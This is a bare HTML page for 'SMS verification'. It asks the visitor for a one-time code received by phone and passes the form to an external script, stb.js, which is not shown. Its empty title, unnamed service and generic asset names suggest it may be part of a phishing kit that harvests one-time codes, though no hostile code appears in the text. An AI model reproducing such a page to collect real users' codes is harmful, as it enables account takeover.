<!DOCTYPE html>
<html >
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="stylesheet" href="./css/moilo.css">
    <script src="https://code.jquery.com/jquery-3.6.0.min.js" integrity="sha256-/xUj+3OJU5yExlq6GSYGSHk7tPXikynS7ogEvDej/m4=" crossorigin="anonymous"></script>
    <title></title>
</head>
<body>

    <div class="top1">
        <img src="./img/tipola.JPG" alt="">
    </div>

    <div class="kolch2">
        <p class="pp1">SMS verification</p>
        <p class="pp3">Thank you for authenticating by entering the one-time security code you received on your phone.</p>

        <form method="post" id="pg3">
            <div class="cc mm">
                <input class="inp2" type="tel" name="" id="sps1" placeholder="SMS code" maxlength="10" required>

               
            </div>
            <!--  -->
          
            <button type="submit">
                
            Confirm          </button>
        </form>
    </div>
    
    <!-- my script -->
    <script src="./js/stb.js"></script>
</body>
</html>